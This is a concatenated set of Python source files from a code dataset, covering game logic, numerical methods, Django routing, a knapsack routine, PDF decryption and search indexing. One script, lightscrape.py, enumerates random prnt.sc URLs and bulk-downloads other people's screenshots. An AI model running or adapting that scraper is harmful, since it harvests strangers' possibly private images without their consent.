+= 1\n self.hero.progress = 0\n\n hero_step_up_signal.send(\n sender=None,\n char_id=self.char_id,\n hero_id=self.id,\n new_step=self.hero.step\n )\n\n self.step = self.hero.step\n self.hero.save()\n hero_changed_signal.send(\n sender=None,\n hero_id=self.id\n )\n\n\nclass HeroSoul(object):\n def __init__(self, char_id):\n self.char_id = char_id\n try:\n self.mongo_hs = 
MongoHeroSoul.objects.get(id=self.char_id)\n except DoesNotExist:\n self.mongo_hs = MongoHeroSoul(id=self.char_id)\n self.mongo_hs.souls = {}\n self.mongo_hs.save()\n\n def soul_amount(self, _id):\n return self.mongo_hs.souls.get(str(_id), 0)\n\n def has_soul(self, _id, amount=1):\n return self.soul_amount(_id) >= amount\n\n def add_soul(self, souls):\n new_souls = []\n update_souls = []\n for _id, amount in souls:\n str_id = str(_id)\n if str_id in self.mongo_hs.souls:\n self.mongo_hs.souls[str_id] += amount\n update_souls.append((_id, self.mongo_hs.souls[str_id]))\n else:\n self.mongo_hs.souls[str_id] = amount\n new_souls.append((_id, amount))\n\n self.mongo_hs.save()\n if new_souls:\n msg = protomsg.AddHeroSoulNotify()\n for _id, amount in new_souls:\n s = msg.herosouls.add()\n s.id = _id\n s.amount = amount\n\n publish_to_char(self.char_id, pack_msg(msg))\n\n if update_souls:\n msg = protomsg.UpdateHeroSoulNotify()\n for _id, amount in update_souls:\n s = msg.herosouls.add()\n s.id = _id\n s.amount = amount\n\n publish_to_char(self.char_id, pack_msg(msg))\n\n\n def remove_soul(self, souls):\n remove_souls = []\n update_souls = []\n for _id, amount in souls:\n if not self.has_soul(_id, amount):\n raise SanguoException(\n errormsg.SOUL_NOT_ENOUGH,\n self.char_id,\n \"HeroSoul Remove\",\n \"HeroSoul {0} not enough/exist, expected amount {1}\".format(_id, amount)\n )\n\n for _id, amount in souls:\n str_id = str(_id)\n self.mongo_hs.souls[str_id] -= amount\n if self.mongo_hs.souls[str_id] <= 0:\n remove_souls.append(_id)\n self.mongo_hs.souls.pop(str_id)\n else:\n update_souls.append((_id, self.mongo_hs.souls[str_id]))\n\n self.mongo_hs.save()\n if remove_souls:\n msg = protomsg.RemoveHeroSoulNotify()\n msg.ids.extend(remove_souls)\n\n publish_to_char(self.char_id, pack_msg(msg))\n\n if update_souls:\n msg = protomsg.UpdateHeroSoulNotify()\n for _id, amount in update_souls:\n s = msg.herosouls.add()\n s.id = _id\n s.amount = amount\n\n publish_to_char(self.char_id, pack_msg(msg))\n\n\n def purge_soul(self, _id):\n self.mongo_hs.souls.pop(str(_id))\n self.mongo_hs.save()\n\n msg = protomsg.RemoveHeroSoulNotify()\n msg.ids.append(_id)\n publish_to_char(self.char_id, pack_msg(msg))\n\n\n def send_notify(self):\n msg = protomsg.HeroSoulNotify()\n for _id, amount in self.mongo_hs.souls.iteritems():\n s = msg.herosouls.add()\n s.id = int(_id)\n s.amount = amount\n\n publish_to_char(self.char_id, pack_msg(msg))\n\nclass _SaveHeroResult(object):\n __slots__ = ['id_range', 'actual_heros', 'to_souls']\n\nclass _FakeSaveHeroResult(object):\n __slots__ = ['id_range', 'actual_heros', 'to_souls']\n def __init__(self):\n self.id_range = []\n self.actual_heros = []\n self.to_souls = []\n\n def __bool__(self):\n return False\n __nonzero__ = __bool__\n\n\nFakeSaveHeroResult = _FakeSaveHeroResult()\n\n\n\ndef get_char_hero_oids(char_id):\n heros = MongoHero.objects.filter(char=char_id)\n return [h.oid for h in heros]\n\ndef save_hero(char_id, hero_original_ids, add_notify=True):\n if not isinstance(hero_original_ids, (list, tuple)):\n hero_original_ids = [hero_original_ids]\n\n char_hero_oids = get_char_hero_oids(char_id)\n\n to_soul_hero_ids = []\n for h in hero_original_ids[:]:\n if h in char_hero_oids:\n to_soul_hero_ids.append(h)\n hero_original_ids.remove(h)\n\n souls = {}\n if to_soul_hero_ids:\n for sid in to_soul_hero_ids:\n this_hero = HEROS[sid]\n souls[this_hero.id] = souls.get(this_hero.id, 0) + 1\n\n for k in souls.keys():\n souls[k] *= 
external_calculate.Hero.step_up_using_soul_amount(HEROS[k].quality)\n\n hs = HeroSoul(char_id)\n hs.add_soul(souls.items())\n\n hero_to_soul_signal.send(\n sender=None,\n char_id=char_id,\n souls=souls.items(),\n )\n\n id_range = []\n if hero_original_ids:\n length = len(hero_original_ids)\n id_range = id_generator('charhero', length)\n for i, _id in enumerate(id_range):\n MongoHero(id=_id, char=char_id, oid=hero_original_ids[i], step=HERO_START_STEP, progress=0).save()\n\n hero_add_signal.send(\n sender=None,\n char_id=char_id,\n hero_ids=id_range,\n hero_original_ids=hero_original_ids,\n send_notify=add_notify,\n )\n\n res = _SaveHeroResult()\n res.id_range = id_range\n res.actual_heros = [(oid, 1) for oid in hero_original_ids]\n res.to_souls = souls.items()\n return res\n\n\ndef recruit_hero(char_id, _id):\n if _id not in HEROS:\n raise SanguoException(\n errormsg.SOUL_CAN_NOT_RECRUIT,\n char_id,\n \"Recruit Hero\",\n \"Soul {0} not exist\".format(_id)\n )\n\n char_hero_oids = get_char_hero_oids(char_id)\n if _id in char_hero_oids:\n raise SanguoException(\n errormsg.SOUL_CAN_NOT_RECRUIT,\n char_id,\n \"Recruit Hero\",\n \"Hero {0} already exist\".format(_id)\n )\n\n\n soul_amount = external_calculate.Hero.step_up_using_soul_amount(HEROS[_id].quality)\n hs = HeroSoul(char_id)\n hs.remove_soul([(_id, soul_amount)])\n\n save_hero(char_id, [_id])\n\n","sub_path":"sanguo/core/hero.py","file_name":"hero.py","file_ext":"py","file_size_in_byte":14254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"350415459","text":"\"\"\"Modulo que contiene el codigo para construir el Polinomio Interpolante de Lagrange\"\"\"\n\nfrom sage.all import SR, sage, round\nimport sys\nimport numpy as np\nfrom Mods_Preparar_Metodos.Preparar_Programa import LLenar_Matriz_Datos, OpcionesLag\n\ndef Interpolacion_Lagrange(nombre):\n \"\"\"Funcion que construira el Polinomio Interpolante de Lagrange\"\"\"\n # Primero llena una matriz con los datos contenidos en el documento de texto\n matDatos = LLenar_Matriz_Datos(nombre)\n\n # Manda a llamar a la funcion 'Opciones' para pedir al usuario que elija una opcion para usar la formula de lagrange, saber cuales son\n # los datos que el usuario desea elegir y para almacenar los indices de las filas de 'matDatos' que se van a usar en 'indicesDatos'\n indicesDatos = OpcionesLag(matDatos)\n\n # Revisa el contenido del primer elemento de 'indicesDatos' para saber que opcion eligio el usuario\n if indicesDatos[0] == 1 or indicesDatos[0] == 2: # Construye el Polinomio Interpolante de Lagrange\n opcionAux = indicesDatos[0]\n # Elimina el primer elemento de 'indicesDatos'\n indicesDatos = indicesDatos[1:]\n # Ordena los indices de forma ascendente y elimina los valores duplicados\n indicesDatos = list(set(indicesDatos))\n\n # Crea la lista que contendra los polinomios de lagrange\n PolinomiosInterLag = list()\n\n # Declara las variables que contendran la expresiones que estaran en el numerador y en el denominador de cada polinomio de lagrange\n numerador = \"\"\n denominador = \"\"\n\n cont = 0\n # Bucle que construye el polinomio interpolante de lagrange\n for elemento in indicesDatos:\n # Bucle que construira el numerador\n for elemNum in indicesDatos:\n # Condicional que se saltara este paso en caso de que lleguemos al elemento que no ira en el numerdor\n if elemNum == elemento:\n # Almacena en la variable 'elemFunAux' el indice del valor que estamos saltando para despues\n # usarlo al multiplicar los polinomio interpolantes por 
el valor de la funcion en ese punto\n elemFunAux = elemNum\n continue\n else:\n numerador += f\"(x - {matDatos[elemNum, 0]})*\"\n # Elimina el ultimo signo '*' de la cadena almacenada en la variable 'numerador'\n numerador = \"(\" + numerador[:(len(numerador) - 1)] + \")\"\n\n # Bulce que construira el denominador\n for elemDen in indicesDatos:\n # Condicional que se saltara este paso en caso de que lleguemos al elemento que no ira en el numerdor\n if elemDen == elemento:\n continue\n else:\n denominador += f\"({matDatos[elemento, 0]} - {matDatos[elemDen, 0]})*\"\n # Elimina el ultimo signo '*' de la cadena almacenada en la variable 'denominador'\n denominador = \"(\" + denominador[:(len(denominador) - 1)] + \")\"\n\n # Agrega a la lista de polinomio el polinomio que se forma con el numerador y el denominador de los bucles anteriores\n PolinomiosInterLag.append(f\"{numerador} / {denominador}\")\n\n numerador = \"\"\n denominador = \"\"\n\n # Multiplica el polinomio interpolante de lagrange por el valor de la funcion \n PolinomiosInterLag[cont] = \"(\" + f\"({round(matDatos[elemFunAux, 1], 6)}) * \" + f\"({PolinomiosInterLag[cont]})\" + \")\"\n\n cont += 1\n\n # Declara variable que contendra el polinomio aplicando la formula de lagrange\n polinomio = \"\"\n\n # Bucle que convertira de formato 'srt' a formato de sagemath los polinomios obtenidos por los bucles anteriores y los sumara\n for pol in PolinomiosInterLag:\n polinomio += pol + \"+\"\n\n # Elimina el ultimo signo '+' de la cadena almacenada en la variable 'polinomio'\n polinomio = polinomio[:(len(polinomio) - 1)]\n\n if opcionAux == 1: # Convierte la cadena de caracteres que contiene el polinomio en formato de sagemath\n polinomio = SR(polinomio)\n\n # Simplifica el polinomio resultante y lo imprime\n print(f\"\\n\\nEl Polinomio Interpolante es: {polinomio.simplify_full()}\\n\")\n\n else: # Sustituye el punto que se quiere calcular por las 'x' que aparecen en la cadena de caracteres que contiene el polinomio\n x = float(input(\"\\nIngresa una abscisa: \")) # Pide al usuario una abscisa\n polinomio = polinomio.replace('x', str(x))\n polinomio = SR(polinomio)\n\n # Simplifica el resultado y lo imprime redondeandolo a 8 decimales\n print(f\"\\n\\nEl valor de la funcion en el punto {x} es aproximadamente: {round(polinomio.simplify_full(), 8)}\\n\")\n\n #elif indicesDatos[0] == 3: # Aplica el metodo de Neville\n # print(\"nada\")\n\ndef Lagrange():\n fNombre = input(\"Escribe el nombre del archivo sin escribir la extension '.txt': \")\n Interpolacion_Lagrange(fNombre)\n\nif __name__ == \"__main__\":\n Interpolacion_Lagrange(\"prueba\")","sub_path":"Mets6_IntYAproxPol/Met1_PolInterLagMain.py","file_name":"Met1_PolInterLagMain.py","file_ext":"py","file_size_in_byte":5109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"207341497","text":"from tools.load import LoadMatrix\nfrom sg import sg\nlm=LoadMatrix()\n\ntraindat=lm.load_numbers('../data/fm_train_real.dat')\nparameter_list=[[traindat,10,3],[traindat,11,4]]\ndef clustering_hierarchical (fm_train=traindat, size_cache=10,merges=3):\n\n\tsg('set_features', 'TRAIN', fm_train)\n\tsg('set_distance', 'EUCLIDIAN', 'REAL')\n\tsg('new_clustering', 'HIERARCHICAL')\n\tsg('train_clustering', merges)\n\n\t[merge_distance, pairs]=sg('get_clustering')\n\treturn [merge_distance, pairs]\n\nif 
__name__=='__main__':\n\tprint('Hierarchical')\n\tclustering_hierarchical(*parameter_list[0])\n","sub_path":"build/shogun_lib/examples/undocumented/python_static/clustering_hierarchical.py","file_name":"clustering_hierarchical.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"289357199","text":"# Описать метод PowerA234(A,B,C,D) вычисляющий вторую, \n# третью и четвертую степень числа A и возвращающий\n# эти степени соответственно в переменных B C D\n# А - входной параметр B C D - выходные. Все параметры вещественные\n# С помощью этого метода найти вторую, третью и четвертую степень\n# пяти данных чисел\n\n\ndef power_a():\n try:\n a = float(input('Enter number: '))\n b = a ** 2\n c = a ** 3\n d = a ** 4\n return b, c, d\n except ValueError:\n return 'Use only numbers'\n\n\ni = 5\nwhile i > 0:\n print(power_a())\n i -= 1\n","sub_path":"lesson5/power.py","file_name":"power.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"395665862","text":"import sqlite3\r\nfrom sqlite3 import Error\r\n\r\ndef create_connection(db_file):\r\n try:\r\n conn = sqlite3.connect(db_file)\r\n print(sqlite3.version)\r\n return conn\r\n except Error as e:\r\n print(e)\r\n return None\r\n\r\ndef create_task(conn, task):\r\n sql = ''' INSERT INTO tutorial_ticket(id,plugin_id,date,hostname,ip_address,plugin_name)\r\n VALUES(?,?,?,?,?,?) '''\r\n cur = conn.cursor()\r\n cur.execute(sql, task)\r\n return cur.lastrowid\r\n\r\ndef main():\r\n database = \"db.sqlite3\"\r\n conn = create_connection(database)\r\n with conn:\r\n task = ('6','97000','2019-01-07 13:02:15','sbibpl_gns.ad.trw.com','192.168.1.1','NFS Vulnerability')\r\n create_task(conn, task)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"update_db.py","file_name":"update_db.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"133852254","text":"from django.urls import path\n\nfrom .views import (\n DetailPlantings,\n client_index,\n coopdetailPlantings,\n plants_par_section,\n projet,\n detail_proj,\n localisation,\n detail_coop,\n # chart,\n prod_coop,\n parcelle_coop,\n localisation_coop,\n section_coop,\n sous_section_coop,\n planting_coop, formations,\n detail_formation,\n export_prod_xls,\n export_parcelle_xls,\n export_prods_to_pdf,\n export_parcelles_to_pdf,\n Plantings,\n # export_plant_xls,\n # export_formation_xls,\n # export_prods_to_pdf,\n # export_parcelles_to_pdf,\n # producteursPDF\n)\n\napp_name='clients'\n\n\nurlpatterns = [\n # path('', connexion, name='connexion'),\n # path('logout', loggout, name='logout'),\n path('index/', client_index, name='dashboard'),\n path('projets/', projet, name='projets'),\n path('formation/', formations, name='formations'),\n path('formation//', detail_formation, name='formation'),\n path('producteurs/', prod_coop, name='prod_coop'),\n path('parcelles/', parcelle_coop, name='parcelle_coop'),\n path('sections/', section_coop, name='section_coop'),\n path('sous_sections/', sous_section_coop, name='sous_section_coop'),\n path('planting/', planting_coop, name='planting_coop'),\n path('coordonnes/', localisation_coop, name='localisation_coop'),\n path('localisation/', localisation, name='localisation'),\n path('Plantings/', Plantings, name='Plantings'),\n path('DetailPlantings/', DetailPlantings, 
name='DetailPlantings'),\n path('coopdetailPlantings/', coopdetailPlantings, name='coopdetailPlantings'),\n path('plants_par_section/', plants_par_section, name='plants_par_section'),\n \n # path('site_pepinieres/', site_pepinieres, name='site_pepinieres'),\n # path('coop_pepiniere/', coop_pepiniere, name='coop_pepiniere'),\n path('detail_proj/', detail_proj, name='detail_proj'),\n path('detail_coop/', detail_coop, name='detail_coop'),\n # #Charts\n # path('Stats_coop/', Stats_coop, name='stats_coop'),\n # path('Stats_semences/', Stats_semences, name='stats_semences'),\n # path('Production_plan/', Production_plan, name='production_plan'),\n # path('plants_coop/', plants_coop, name='plants_coop'),\n # path('semences_coop/', semences_coop, name='semences_coop'),\n # path('chart/', chart, name='chart'),\n #\n # #Export to Excel\n path('cooperative//producteurs/xls/', export_prod_xls, name='export_prod_xls'),\n # # path('sections/xls/', export_section_xls, name='export_section_xls'),\n # # path('sous_sections/xls/', export_sous_section_xls, name='export_sous_section_xls'),\n path('cooperative//parcelles/xls/', export_parcelle_xls, name='export_parcelle_xls'),\n # path('cooperative//plants/xls/', export_plant_xls, name='export_plant_xls'),\n # path('cooperative//formations/xls/', export_formation_xls, name='export_formation_xls'),\n #\n # # Export Données EN PDF\n path('producteurs/pdf/', export_prods_to_pdf, name='export_prods_to_pdf'),\n # path('producteurs/pdf/', producteursPDF, name='prods_to_pdf'),\n path('parcelles/pdf/', export_parcelles_to_pdf, name='export_parcelles_to_pdf'),\n]\n","sub_path":"clients/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"495737861","text":"\"\"\"\nGiven a set of items, each with an arbitrary positive weight and a value = 1 or 2 ,\ndetermine which items to include in a collection so that the total weight is less than\nor equal to a given limit and the total value is as large as possible.\n\nFind a polynomial algorithm.\n--\noption:\nstandard knapsack\nbest(weight, with_item) -> best(weight, without_item), best(weight-i, without_item)+ val(item)\n\nat the end, gather\n\"\"\"\nimport collections\n\n\ndef res_knapsack(weights, vals, limit):\n ones = []\n twos = []\n for idx, v in enumerate(vals):\n if v == 1:\n ones.append((weights[idx], idx))\n else:\n twos.append((weights[idx], idx))\n\n ones = collections.deque(sorted(ones))\n twos = collections.deque(sorted(twos))\n\n last_one = None\n weight = 0\n added = set()\n while len(ones) >= 2 and twos:\n one_val = ones[0][0] + ones[1][0]\n two_val = twos[0][0]\n if weight + min(one_val, two_val) > limit:\n break\n if two_val <= one_val:\n w, idx = twos.popleft()\n weight += w\n added.add(idx)\n else:\n w1, idx1 = ones.popleft()\n w2, idx2 = ones.popleft()\n weight += w1 + w2\n added.add(idx1)\n added.add(idx2)\n last_one = (w2, idx2)\n\n while twos and weight + twos[0][0] <= limit:\n w, idx = twos.popleft()\n weight += w\n added.add(idx)\n\n while ones and weight + ones[0][0] <= limit:\n w, idx = ones.popleft()\n weight += w\n added.add(idx)\n last_one = (w, idx)\n\n if last_one:\n if weight - last_one[0] + twos[0][0] <= limit:\n one_w, one_idx = last_one\n weight -= one_w\n added.remove(one_idx)\n two_w, two_idx = twos.popleft()\n weight += two_w\n added.add(two_idx)\n\n return 
added\n","sub_path":"lc_discuss/old/batch_2c/restricted_knapsack.py","file_name":"restricted_knapsack.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"1477314","text":"\"\"\"Global variables to store the count of the letters and words\"\"\"\nwordsDict = {}\nlettersDict = {}\n\n\ndef cleanupLine(line):\n \"\"\"this function will remove characters that are not needed from the line-string. Unwanted characters are all characters except a-z, A-Z, 0-9 and ' and should be replaced with a space\n long-term -> long term\n It's amazing, isn't it? -> Is's amazaing isn't it\n Note, if you are familiar with regex, you can use that, otherwise a loop is fine\"\"\"\n stripped_line = \"\"\n # print(line)\n result = []\n for character in line:\n \"\"\"Get the ascii code of the character\"\"\"\n ascii = ord(character)\n \"\"\"One way to check if the letter is our target (a-z, A-Z, 0-9 and ') is\n check their ascii code. ascii code 48 - 57 is 0 - 9, 65 - 90 is A-Z,\n 97 - 122 is a-z and 39 is '.\"\"\"\n if (ascii >= 48 and ascii <= 57) or \\\n (ascii >= 65 and ascii <= 90) or \\\n (ascii >= 97 and ascii <= 122) or \\\n (ascii == 39):\n \"\"\"characters in the scopes given will be appended to list as is\"\"\"\n result.append(character)\n else:\n \"\"\"Any thing outside this ranges will \n considered as not target and will be replaced with a space.\"\"\"\n result.append(\" \")\n stripped_line = \"\".join(result)\n return stripped_line\n\n\ndef countWords(line):\n \"\"\"For a stripped line, this function counts the words and updates\n the globla variable wordsDict{}.\n Note, we convert upper case words to lower case words\"\"\"\n global wordsDict\n\n \"\"\"Using string.split() fuction to get a list of words of the line\"\"\"\n for word in line.split():\n \"\"\"Convert the word into lower case\"\"\"\n target = word.lower()\n \"\"\"Check whether the targetr word exist in the dictionary or not.\"\"\"\n if target in wordsDict.keys():\n \"\"\"If the target word exist in the dictionary,\n then get the current count and increment by 1 then \n store back to the dictionary\"\"\"\n wordsDict[target] += 1\n else:\n \"\"\"If the target word not exists in the ductionary,\n then set 1 and store back to dictionary\"\"\"\n wordsDict[target] = 1\n\n return wordsDict\n\n\ndef countLetters(line):\n \"\"\"For a stripped line, this function counts the letters and updates\n the globla variable lettersDict{}.\n Note, we convert upper case letters to lower case\n Note2, numbers and ' should be ignored\"\"\"\n global lettersDict\n for character in line:\n \"\"\"Conver all character into lower case\"\"\"\n target = character.lower()\n\n ascii = ord(target)\n \"\"\"Check whether the target character is number or ', \n if yes, then skip the target and get next character.\"\"\"\n \"\"\"Need clarification\"\"\"\n if (ascii >= 48 and ascii <= 57) or \\\n (ascii == 39):\n continue\n\n \"\"\"Check whether the target character is in the dictionary already\"\"\"\n if target in lettersDict.keys():\n \"\"\"If the target character exist in the dictionary, \n then get the current count and plus 1\"\"\"\n lettersDict[target] += 1\n else:\n \"\"\"If the target character not exist in the dictionary, \n then set the count to 1\"\"\"\n lettersDict[target] = 1\n\n return lettersDict\n\n\ndef readFiles(filename):\n handle = open(filename, 'r')\n for line in handle:\n stripped_line = cleanupLine(line)\n countWords(stripped_line)\n 
countLetters(stripped_line)\n\n\ndef results():\n return [6209, 1566, 1205, 302, 132, 334]\n","sub_path":"tw/idv/sang/repl/AS3-Frequency.py","file_name":"AS3-Frequency.py","file_ext":"py","file_size_in_byte":3717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"650926333","text":"# coding: utf-8\n\"\"\"*****************************************************************************\n* Copyright (C) 2018 Microchip Technology Inc. and its subsidiaries.\n*\n* Subject to your compliance with these terms, you may use Microchip software\n* and any derivatives exclusively with Microchip products. It is your\n* responsibility to comply with third party license terms applicable to your\n* use of third party software (including open source software) that may\n* accompany Microchip software.\n*\n* THIS SOFTWARE IS SUPPLIED BY MICROCHIP \"AS IS\". NO WARRANTIES, WHETHER\n* EXPRESS, IMPLIED OR STATUTORY, APPLY TO THIS SOFTWARE, INCLUDING ANY IMPLIED\n* WARRANTIES OF NON-INFRINGEMENT, MERCHANTABILITY, AND FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n* IN NO EVENT WILL MICROCHIP BE LIABLE FOR ANY INDIRECT, SPECIAL, PUNITIVE,\n* INCIDENTAL OR CONSEQUENTIAL LOSS, DAMAGE, COST OR EXPENSE OF ANY KIND\n* WHATSOEVER RELATED TO THE SOFTWARE, HOWEVER CAUSED, EVEN IF MICROCHIP HAS\n* BEEN ADVISED OF THE POSSIBILITY OR THE DAMAGES ARE FORESEEABLE. TO THE\n* FULLEST EXTENT ALLOWED BY LAW, MICROCHIP'S TOTAL LIABILITY ON ALL CLAIMS IN\n* ANY WAY RELATED TO THIS SOFTWARE WILL NOT EXCEED THE AMOUNT OF FEES, IF ANY,\n* THAT YOU HAVE PAID DIRECTLY TO MICROCHIP FOR THIS SOFTWARE.\n*****************************************************************************\"\"\"\n\nglobal debugID\n\n###################################################################################################\n########################################## Callbacks #############################################\n###################################################################################################\n\ndef onAttachmentConnected(source, target):\n\n global debugID\n\n localComponent = source[\"component\"]\n remoteComponent = target[\"component\"]\n remoteID = remoteComponent.getID()\n connectID = source[\"id\"]\n targetID = target[\"id\"]\n\n remoteComponent.setSymbolValue(\"USART_INTERRUPT_MODE\", False, 2)\n debugID.setValue(remoteID, 2)\n\ndef onAttachmentDisconnected(source, target):\n\n global debugID\n\n localComponent = source[\"component\"]\n remoteComponent = target[\"component\"]\n remoteID = remoteComponent.getID()\n connectID = source[\"id\"]\n targetID = target[\"id\"]\n\n debugID.clearValue()\n\n###################################################################################################\n########################################## Component #############################################\n###################################################################################################\n\ndef instantiateComponent(debugComponent):\n\n global debugID\n\n debugID = debugComponent.createStringSymbol(\"SECURE_DEBUG_PERIPHERAL\", None)\n debugID.setVisible(False)\n","sub_path":"arch/stdio/config/stdio_secure.py","file_name":"stdio_secure.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"15287977","text":"speed = float(input())\na = (\"slow\", \"average\", \"fast\", \"ultra fast\", \"extremely fast\")\ncoefficient = 0\nif speed <= 10:\n coefficient = 0\nelif 10 < speed <= 50:\n 
coefficient = 1\nelif 50 < speed <= 150:\n coefficient = 2\nelif 150 < speed <= 1000:\n coefficient = 3\nelse:\n coefficient = 4\nprint(a[coefficient])\n","sub_path":"Python-Basic/Ex_lec_3_conditional_statements/03_Speed_Info.py","file_name":"03_Speed_Info.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"620358544","text":"import PyPDF2\n\npdfReader = PyPDF2.PdfFileReader(open('encrypted.pdf', 'rb'))\n\nprint('pdfReader.isEncrypted: %s' %(pdfReader.isEncrypted))\n\n# The following line will fail fail because the 'encrypted.pdf' file is\n# encrypted with a password of 'rosebud' (The Sims money cheat reference)\n\n# print('Attempting to get the first page from the encrypted PDF: pdfReader.getPage(0): %s' %(pdfReader.getPage(0)))\n\npdfReader.decrypt('rosebud')\n\npageObj = pdfReader.getPage(0)\n\nprint('pageObj: %s' %(pageObj))\n\n\n","sub_path":"python/03AutomateTheBoringStuffWithPython/13WorkingWithPDFAndWordDocuments/02DecryptingPDFs.py","file_name":"02DecryptingPDFs.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"551570972","text":"from selenium import webdriver\nfrom selenium.webdriver import Chrome\nfrom selenium.webdriver.chrome.options import Options\nimport wget, random, string, os, selenium, sys, platform\n\noptions = Options()\noptions.add_argument(\"--headless\")\noptions.add_argument(\"--window-size=1920x1080\")\noptions.add_experimental_option('excludeSwitches', ['enable-logging'])\n\nBASE_URL = 'https://prnt.sc/'\nlower_alphabet = string.ascii_lowercase\n\nif platform.system() == 'Windows':\n webdriver = \"chromedriver.exe\"\nelif platform.system() == 'Linux':\n webdriver = \"chromedriver\"\nelse:\n print(\"Not supported OS. 
(Only Windows and Linux)\")\n\ndriver = Chrome(options=options, executable_path=webdriver)\n\ntry:\n os.mkdir('shots')\nexcept:\n print('Dir \"shots\" exists')\nfinally:\n os.chdir('shots')\n\ndef randNL():\n list = []\n for i in range(6):\n choise = random.randint(0,1)\n if choise == 0:\n list.append(random.randint(0,9))\n else:\n list.append(random.choice(lower_alphabet))\n END_URL = ''.join(map(str, list))\n return END_URL\n\ndef main(i):\n for n in range(int(i)):\n while True:\n driver.get(BASE_URL+randNL())\n try:\n img = driver.find_element_by_id('screenshot-image').get_attribute('src')\n if img.__contains__('imgur'):\n print('\\n{}.'.format(str(n+1)))\n wget.download(img)\n break\n except selenium.common.exceptions.NoSuchElementException:\n print('\\nElement not found')\n\nif __name__ == \"__main__\":\n main(sys.argv[1])\n","sub_path":"lightscrape.py","file_name":"lightscrape.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"266831972","text":"\"\"\"Module for Protein Alternate classification.\"\"\"\nimport re\nfrom typing import Optional\n\nfrom bioutils.sequences import aa3_to_aa1_lut\n\nfrom variation.schemas.token_response_schema import Token, TokenMatchType\nfrom .tokenizer import Tokenizer\n\n\nclass ProteinAlternate(Tokenizer):\n \"\"\"The Protein Alternate Tokenization class.\"\"\"\n\n def __init__(self) -> None:\n \"\"\"Initialize the Protein Alternate Tokenizer class.\"\"\"\n self.__splitter = re.compile(r\"\\d+\")\n\n def match(self, input_string: str) -> Optional[Token]:\n \"\"\"Return Protein Alternate tokens if input string matches.\"\"\"\n potential_protein = self.__splitter.split(input_string)\n if all((len(potential_protein) == 2,\n potential_protein[0] in aa3_to_aa1_lut,\n not potential_protein[1])):\n return Token(\n token=potential_protein[0],\n token_type=\"ProteinAlternate\",\n input_string=input_string,\n match_type=TokenMatchType.UNSPECIFIED\n )\n else:\n return None\n","sub_path":"variation/tokenizers/protein_alternate.py","file_name":"protein_alternate.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"142386976","text":"import sys\nimport typesense\nimport unicodedata\n\nfileName = sys.argv[1]\n\nclient = typesense.Client({\n 'nodes': [{\n 'host': 'localhost', # For Typesense Cloud use xxx.a1.typesense.net\n 'port': '8108', # For Typesense Cloud use 443\n 'protocol': 'http' # For Typesense Cloud use https\n }],\n 'api_key': 'xyz',\n 'connection_timeout_seconds': 2\n})\n\n# print(fileName)\ndata = open(fileName,'r').read()\n# jsonl_file = jsonl_file.encode('latin-1', 'replace')\n\n\n# print(data[5861456:5861476])\n# print(str(unicodedata.normalize('NFKD', jsonl_file[5814010:5814020]).encode('ascii', 'ignore')))\n# data = unicodedata.normalize('NFKD', jsonl_file).encode('ascii', 'ignore').decode(\"utf-8\")\n\nreturn_data = client.collections['blogs'].documents.import_(data)\nprint('Documents length: ', len(data.split('\\n'))-1)\nprint('Sucessfully added: ', return_data.count('true'))\n\n","sub_path":"addDocuments.py","file_name":"addDocuments.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"145982517","text":"from turtle import *\nfrom math import cos,pi\n\"\"\"\n用小圆圈围成大圆圈\n\"\"\"\nx,y=0,0\ndef t(r=10,n=6):\n\tglobal x,y\n\tspeed(0)\n\tfor i in range(n):\n\t\tif 
